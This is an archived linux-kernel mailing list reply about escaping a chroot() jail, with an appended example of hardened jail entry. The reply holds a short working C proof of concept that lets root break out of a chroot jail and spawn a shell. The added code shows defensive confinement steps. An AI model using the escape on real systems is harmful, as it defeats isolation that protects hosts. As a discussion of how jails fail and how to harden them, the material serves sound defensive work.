Re: prevent breaking a chroot() jail?

Miquel van Smoorenburg (miquels@cistron.nl)
Fri, 5 Jul 2002 14:02:58 +0000 (UTC)


In article <1025877004.11004.59.camel@zaphod>,
Shaya Potter <spotter@cs.columbia.edu> wrote:
>I'm trying to develop a way to ensure that one can't break out of a
>chroot() jail, even as root. I'm willing to change the way the syscalls
>work (most likely only for a subset of processes, i.e. processes that
>are run in the jail end up getting a marker which is passed down to all
>their children that causes the syscalls to behave differently).
>What should I be aware of? I figure devices (no need to run mknod in
>this jail) and chroot (as per man page), is there any other way of
>breaking the chroot jail (at a syscall level or otherwise)?

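#include <sys/stat.h>
#include <unistd.h>

int main()
{
	chdir("/");
	mkdir("foo", 0755);
	chroot("foo");			/* root is now foo, cwd is still outside it */
	chdir("../../../../../../..");	/* walks up from the old cwd */
	chroot(".");
	execl("/bin/sh", "sh", (char *)NULL);
	return 1;			/* only reached if execl() fails */
}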

Run as root and you're out of the chroot jail. This is because
chroot() doesn't chdir() to the new root, so after a chroot() in
the chroot jail you're suddenly out of it.

Mike.

-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at http://vger.kernel.org/majordomo-info.html
Please read the FAQ at http://www.tux.org/lkml/
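
The escape in the message above needs root inside the jail and a working directory that chroot() leaves untouched. The following is an added example, not code from the original post: an entry sequence that removes both conditions. The names enter_jail, dir, uid and gid, and the usage values, are assumptions made for illustration.

```c
#define _DEFAULT_SOURCE
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* enter_jail() is a hypothetical helper (added example). Returns 0 once the
 * process is confined and unprivileged, -1 otherwise; exit on -1. */
int enter_jail(const char *dir, uid_t uid, gid_t gid)
{
	/* uid 0 keeps chroot() usable in the jail; gid 0 keeps root's group. */
	if (uid == 0 || gid == 0) {
		errno = EINVAL;
		return -1;
	}
	/* Move the working directory into the jail before changing root ... */
	if (chdir(dir) != 0 || chroot(".") != 0)
		return -1;
	/* ... and pin it to the new root so no cwd is left outside it. */
	if (chdir("/") != 0)
		return -1;
	/* Drop supplementary groups, then gid, then uid; reverse order fails. */
	if (setgroups(1, &gid) != 0 || setgid(gid) != 0 || setuid(uid) != 0)
		return -1;
	/* Verify root cannot be regained. */
	if (setuid(0) == 0) {
		errno = EPERM;
		return -1;
	}
	return 0;
}

int main(int argc, char **argv)
{
	/* Constructed usage: ./jail /srv/jail 65534 65534 */
	if (argc != 4) {
		fprintf(stderr, "usage: %s dir uid gid\n", argv[0]);
		return 2;
	}
	if (enter_jail(argv[1], (uid_t)atoi(argv[2]), (gid_t)atoi(argv[3])) != 0) {
		perror("enter_jail");
		return 1;
	}
	execl("/bin/sh", "sh", (char *)NULL);
	return 1;
}
```

Directory file descriptors opened before the call still refer to locations outside the jail, so close them before calling enter_jail.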